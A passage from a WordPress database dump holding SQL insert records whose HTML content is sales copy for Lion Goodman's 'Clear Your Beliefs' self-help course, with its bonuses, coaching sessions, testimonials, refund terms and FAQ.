Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:13:42', '2014-12-14 19:13:42', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2048, 2, '2014-12-14 14:17:53', '2014-12-14 19:17:53', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a 